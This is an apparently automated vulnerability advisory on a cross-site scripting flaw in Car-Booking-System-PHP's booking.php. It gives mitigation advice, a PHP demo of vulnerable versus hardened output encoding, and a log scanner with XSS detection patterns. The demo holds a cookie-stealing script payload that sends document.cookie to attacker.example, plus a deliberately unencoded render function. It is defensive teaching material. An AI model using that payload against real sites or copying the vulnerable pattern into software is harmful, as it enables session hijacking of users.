CVE-2025-63450: n/a
Car-Booking-System-PHP v.1.0 is vulnerable to Cross Site Scripting (XSS) in /carlux/booking.php.
AI Analysis
Technical Summary
CVE-2025-63450 identifies a Cross Site Scripting (XSS) vulnerability in Car-Booking-System-PHP version 1.0, specifically in the /carlux/booking.php script. XSS arises when an application writes untrusted input into an HTML response without encoding it for the context in which it lands (element body, attribute value, URL, or script block), so that markup or JavaScript supplied by an attacker is rendered and executed by the browser as part of the page. The advisory does not name the affected parameter or say whether the injection is reflected or stored; the most likely pattern for a page of this kind is that booking.php echoes one or more request parameters (query string or form fields) back into the page unencoded. An attacker can then craft a URL or form submission carrying JavaScript that runs in the browser of whoever loads it, with that user's session: reading the session cookie if it is not marked HttpOnly, submitting or altering bookings on the user's behalf, defacing the page, or redirecting to a phishing site. No CVSS score has been assigned and no public exploit is known, but the record is published and should be treated as real. No patch link is listed, which suggests no official fix has been released, so deployments need interim mitigations. Exposure is limited to sites running this particular PHP application, typically small car-rental or booking businesses that deployed it as a ready-made package. A reflected XSS needs no authentication but does need user interaction: the victim must open the crafted link or submit the crafted form, which is normally achieved through phishing. The impact stays within the browser and the application's session context; it does not by itself yield server compromise. Confidentiality and integrity of user data and sessions are the properties at risk, with negligible effect on availability. The threat is therefore moderate, but it should not be ignored on an internet-facing booking site.
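The following PHP is an added illustration of the pattern described above, not code from the Car-Booking-System-PHP project or from the advisory. Because the advisory does not name the affected parameter, the `car` parameter and the surrounding markup are hypothetical; the vulnerable and hardened render functions show the unencoded echo that produces an XSS and the output-encoded, allow-list-validated form that removes it, together with the response headers and session cookie flags that limit the damage of any encoding gap that remains.

```php
<?php
// Added example (not the project's own code). The `car` parameter and the
// markup are hypothetical; the advisory only names /carlux/booking.php.

declare(strict_types=1);

// VULNERABLE pattern: the raw request parameter is interpolated into HTML.
// A value such as  "><script>...</script>  closes the attribute and runs.
function renderVulnerable(array $get): string
{
    $car = $get['car'] ?? '';
    return "<h2>Booking for: $car</h2>\n"
         . "<input type=\"text\" name=\"car\" value=\"$car\">\n";
}

// Encoder for HTML element text and double-quoted attribute values.
// ENT_QUOTES covers both quote characters, ENT_SUBSTITUTE avoids returning
// an empty string on invalid UTF-8, and the charset is stated explicitly.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// HARDENED pattern: validate the input shape, then encode on output.
function renderHardened(array $get): string
{
    $car = $get['car'] ?? '';
    // Allow-list: letters, digits, spaces and hyphens, 1-64 characters.
    // Anything else is discarded rather than reflected.
    if (!preg_match('/\A[\p{L}\p{N} \-]{1,64}\z/u', $car)) {
        $car = '';
    }
    return "<h2>Booking for: " . h($car) . "</h2>\n"
         . "<input type=\"text\" name=\"car\" value=\"" . h($car) . "\">\n";
}

// Defence-in-depth headers: a CSP that refuses inline script blocks
// injected JavaScript even if some echo is still unencoded.
function sendSecurityHeaders(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
    header('X-Content-Type-Options: nosniff');
    header('Referrer-Policy: no-referrer');
}

// Session cookie flags; must be called before session_start().
// HttpOnly keeps document.cookie from reading the session id.
function configureSessionCookie(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
}

if (PHP_SAPI === 'cli') {
    // Constructed payload for the demonstration.
    $payload = ['car' => '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>'];
    echo "--- vulnerable (payload reflected verbatim) ---\n", renderVulnerable($payload);
    echo "--- hardened (payload rejected by allow-list) ---\n", renderHardened($payload);
    echo "--- hardened, benign input ---\n", renderHardened(['car' => 'Audi A4']);
    echo "--- encoder alone, payload neutralised ---\n", h($payload['car']), "\n";
}
```

Run it with `php booking_example.php` to see the three renderings side by side. Validation and encoding are deliberately separate steps: the allow-list stops unexpected input early, while the encoder is what actually makes the output safe, so a future parameter that legitimately needs quotes or angle brackets (a customer name, a free-text note) is still rendered correctly rather than being silently dropped.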
Potential Impact
For European organizations, exploitation could give an attacker control of a victim's authenticated session, exposure of whatever personal or payment data the deployment stores or displays, and manipulation of booking records. A breach of customer data would carry GDPR notification duties and possible penalties, alongside financial loss and reputational damage. Car rental and booking sites are customer-facing and handle personally identifiable information (PII), which makes them worthwhile targets. Injected scripts can also be used to serve convincing phishing pages under the legitimate domain or to redirect visitors to malware. Availability impact is low, but loss of confidentiality and integrity can disrupt operations and customer trust, and legal consequences follow if user data is exposed. The absence of a patch prolongs the exposure, particularly for smaller operators without dedicated security staff. European entities with significant online booking volumes are at higher risk, and the window of opportunity widens during peak travel seasons when traffic and bookings increase.
Mitigation Recommendations
Immediate mitigation should focus on /carlux/booking.php: encode every user-controlled value at the point where it is written into the response, using htmlspecialchars() with ENT_QUOTES and an explicit UTF-8 charset for HTML text and attribute values, and context-specific encoding for any value placed in a URL or inside a script block; validate inputs against an allow-list of expected shapes (for example a numeric car ID or a date) so that unexpected characters are rejected before they reach the template. Add a Content Security Policy that restricts script sources (at minimum 'self', or nonces for inline scripts) so that injected inline JavaScript is blocked even if an encoding gap remains. Set the session cookie with the HttpOnly and Secure flags and a SameSite attribute so that script cannot read it and it is not sent on cross-site navigations. Where feasible, use templating or framework helpers that escape by default rather than hand-written echo statements. Review the rest of the application for the same pattern, since one unencoded echo in booking.php usually means others exist. Monitor web server access logs for requests to booking.php whose parameters contain script tags, event-handler attributes, or javascript: URLs, and correlate by source address, referrer, and user agent. A web application firewall (WAF) with XSS rules can block common payloads in the meantime, but treat it as a stopgap rather than a fix, because encoded or context-specific payloads routinely bypass signature rules. Train staff to be suspicious of booking links received by email. Apply the vendor's patch when one is published, and if the project is unmaintained, plan to replace it. Keep PHP and dependencies current, and have a GDPR-ready incident response plan in case customer data is compromised.
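As an added example of the log monitoring recommended above (not part of the advisory or the project), the PHP script below scans access log lines in the common "combined" format for requests to /carlux/booking.php whose URL-decoded query string contains XSS indicators. The log lines are constructed for the demonstration; the path is the one the CVE names, and the indicator patterns are a starting point to tune, not a complete signature set.

```php
<?php
// Added example: detect XSS probes against /carlux/booking.php in access logs.
// Log lines below are constructed; the path comes from CVE-2025-63450.

declare(strict_types=1);

const TARGET_PATH = '/carlux/booking.php';

// Indicators evaluated after URL decoding. Cheap and high-signal, but not
// exhaustive: double-encoded payloads and POST bodies are out of scope here.
const XSS_PATTERNS = [
    '/<\s*script/i',
    '/javascript\s*:/i',
    '/\bon[a-z]+\s*=/i',                     // onerror=, onload=, ...
    '/<\s*(img|svg|iframe|object|embed)\b/i',
];

// Parse one combined-format line:  ip - - [ts] "METHOD path HTTP/x" status bytes "ref" "ua"
function parseLogLine(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /', $line, $m)) {
        return null;
    }
    $parts = parse_url($m[4]);
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $parts['path'] ?? '',
        'query'  => rawurldecode($parts['query'] ?? ''),
        'status' => (int) $m[5],
    ];
}

// Return the indicator patterns that fire on a decoded query string.
function matchedPatterns(string $decodedQuery): array
{
    $hits = [];
    foreach (XSS_PATTERNS as $re) {
        if (preg_match($re, $decodedQuery)) {
            $hits[] = $re;
        }
    }
    return $hits;
}

// Scan lines and return one alert per suspicious request to the target path.
function scanLines(array $lines): array
{
    $alerts = [];
    foreach ($lines as $line) {
        $req = parseLogLine($line);
        if ($req === null || $req['path'] !== TARGET_PATH) {
            continue;
        }
        $hits = matchedPatterns($req['query']);
        if ($hits !== []) {
            $alerts[] = ['ip' => $req['ip'], 'time' => $req['time'], 'query' => $req['query'], 'hits' => $hits];
        }
    }
    return $alerts;
}

// Constructed sample: one benign booking, two probes, one probe against another page.
$sampleLog = [
    '203.0.113.7 - - [03/Nov/2025:15:44:17 +0000] "GET /carlux/booking.php?car=Audi%20A4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [03/Nov/2025:15:45:02 +0000] "GET /carlux/booking.php?car=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5210 "-" "curl/8.4.0"',
    '198.51.100.9 - - [03/Nov/2025:15:45:10 +0000] "GET /carlux/booking.php?car=x%22%20onerror%3Dalert(1)%20 HTTP/1.1" 200 5190 "-" "curl/8.4.0"',
    '192.0.2.5 - - [03/Nov/2025:15:46:00 +0000] "GET /carlux/index.php?q=%3Cscript%3E HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
];

foreach (scanLines($sampleLog) as $a) {
    printf("[%s] possible XSS probe from %s against %s: %s (%d indicator(s))\n",
        $a['time'], $a['ip'], TARGET_PATH, $a['query'], count($a['hits']));
}
```

Running this against the sample prints two alerts, both from 198.51.100.9; the benign booking and the probe against index.php are ignored. In production, feed it the real log (`php scan.php < access.log` after swapping the array for `file('php://stdin')`), widen TARGET_PATH to a list once the code review finds further injection points, and treat a 200 response to a probe as the signal that the payload was reflected rather than rejected.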
Affected Countries
Germany, France, Italy, Spain, United Kingdom, Netherlands, Belgium
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2025-10-27T00:00:00.000Z
- CVSS Version: null (no score assigned)
- State: PUBLISHED
Threat ID: 6908cdd1bdcf00867c4fc651
Added to database: 11/3/2025, 3:44:17 PM
Last enriched: 11/3/2025, 4:00:02 PM
Last updated: 11/4/2025, 10:35:41 PM
Related Threats
- CVE-2025-0942: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Jalios JPlatform (High)
- CVE-2025-62719: CWE-918 Server-Side Request Forgery (SSRF) in Kovah LinkAce (Low)
- CVE-2025-62721: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor in Kovah LinkAce (High)
- CVE-2025-62720: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor in Kovah LinkAce (High)
- CVE-2025-62369: CWE-94 Improper Control of Generation of Code ('Code Injection') in xibosignage xibo-cms (High)